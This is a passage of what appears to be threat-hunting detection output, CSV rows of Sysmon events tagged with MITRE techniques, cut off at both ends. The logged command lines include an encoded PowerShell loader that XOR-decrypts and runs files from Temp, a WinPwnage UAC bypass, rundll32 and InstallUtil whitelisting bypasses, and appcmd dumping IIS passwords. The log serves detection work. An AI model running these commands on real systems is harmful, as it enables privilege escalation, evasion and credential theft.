8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16243 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:30.023 + 365ABB72-699E-5CD7-0000-001073582200 + 3876 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6168 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.231 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5967 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.714 + 365ABB72-3D6F-5CEB-0000-0010F2CFFF00 + 3844 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 142033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:22:26.451 + 747F3D96-DE32-5EB9-0000-00103FC14300 + 5252 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 580 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:06:55.471 + 747F3D96-78DF-5D45-0000-0010EF400401 + 4320 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-78DF-5D45-0000-0010BD350401 + 5756 + C:\Windows\System32\Dism.exe + "C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556726 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.121 + 747F3D96-182D-610F-0000-00100344D300 + 11196 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-90AF-610F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 632 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.627 + 747F3D96-51D0-5F93-0000-001079C05B00 + 8572 + C:\Windows\SysWOW64\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks.exe + schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4897 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:08.174 + 747F3D96-6614-5D3F-0000-001093CE8600 + 108 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5964 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.513 + 365ABB72-3D6F-5CEB-0000-0010CFCAFF00 + 3892 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQ